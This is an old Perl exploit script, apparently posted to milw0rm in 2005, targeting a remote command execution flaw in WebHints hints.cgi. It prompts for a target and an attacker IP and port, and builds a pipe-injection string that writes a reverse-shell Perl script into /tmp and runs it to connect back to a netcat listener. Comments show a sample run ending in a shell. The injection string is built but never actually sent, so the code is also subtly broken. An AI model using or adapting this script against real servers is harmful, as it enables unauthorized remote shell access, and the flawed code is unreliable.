File size: 3,707 Bytes
497f2f3
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
#!/usr/bin/perl -w

#

#

#emanuele@blackbox:~$ perl M4DR007-hints.pl

#

#

# ~~ www.madroot.edu.ms Security Group ~~

#

# WebHints Software hints.cgi

# Remote Command Execution Vulnerability

# Affected version: <= all

# ~~ code by MadSheep ~~

#

#

# 06.11.2005

#

#

#hostname:

#localhost

#port: (default: 80)

#80

#path: (/cgi-bin/)

#/cgi-bin/

#your ip (for reverse connect):

#127.0.0.1

#your port (for reverse connect):

#7350

#

#

#~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~

#[*] try to exploiting...

#[*] OK!

#[*] NOW, run in your box: nc -l -vv -p 7350

#[*] starting connect back on 127.0.0.1 :7350

#[*] DONE!

#[*] Look netcat windows and funny

#

#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# WARNING - WARNING - WARNING - WARNING

#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#

#If connect back shell not found:

#- you do not have privileges to write in /tmp

#- Shell not vulnerable

#

#

#We r: MadSheep - Punish3r - Spastic_eye - seth - Groove - Mrk

#

#

#emanuele@blackbox:~$

#

#

#emanuele@blackbox:~$ nc -l -vv -p 7350

#

# uid=1001(madhseep) gid=1001(madsheep) grupos=1001(madsheep)

#

#

#

# Come cheer us at #madroot on Freenode ( irc.freenode.net )

#

# (C) 2005 Copyright by madroot Security Group

#

#############################################

use IO::Socket;



print "\n\n ~~ www.madroot.edu.ms Security Group ~~ \n\n";

print " WebHints Software hints.cgi\n";

print " Remote Command Execution Vulnerability\n";

print " Affected version: <= all \n";

print " ~~ code by MadSheep ~~\n\n\n";

print " 06.11.2005\n\n\n";





print "hostname: \n";

chomp($server=<STDIN>);



print "port: (default: 80)\n";

chomp($port=<STDIN>);

$port=80 if ($port =~/\D/ );

$port=80 if ($port eq "" );



print "path: (/cgi-bin/)\n";

chomp($path=<STDIN>);



print "your ip (for reverse connect): \n";

chomp($ip=<STDIN>);



print "your port (for reverse connect): \n";

chomp($reverse=<STDIN>);





print " \n\n";

print "~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~\r\n";



print "[*] try to exploiting...\n";



$string="/$path/hints.pl?|cd /tmp;echo ".q{use Socket;$execute= 'echo "`uname -a`";echo "`id`";/bin/sh';$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system($execute);close(STDIN)}." >>cbs.pl;perl cbs.pl $ip $reverse|";



print "[*] OK! \n";

print "[*] NOW, run in your box: nc -l -vv -p $reverse\n";

print "[*] starting connect back on $ip :$reverse\n";

print "[*] DONE!\n";

print "[*] Look netcat windows and funny\n\n";

$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Proto => tcp)

or die;





print $socket "POST $path HTTP/1.1\n";

print $socket "Host: $server\n";

print $socket "Accept: */*\n";

print $socket "User-Agent: M4DR007\n";

print $socket "Pragma: no-cache\n";

print $socket "Cache-Control: no-cache\n";

print $socket "Connection: close\n\n";



print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

print " WARNING - WARNING - WARNING - WARNING   \r\n";

print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\n";

print "If connect back shell not found:\n";

print "- you do not have privileges to write in /tmp\n";

print "- Shell not vulnerable\n\n\n";

print "We r: MadSheep - Punish3r - Spastic_eye - seth - Groove - Mrk\n\n\n";



# milw0rm.com [2005-06-11]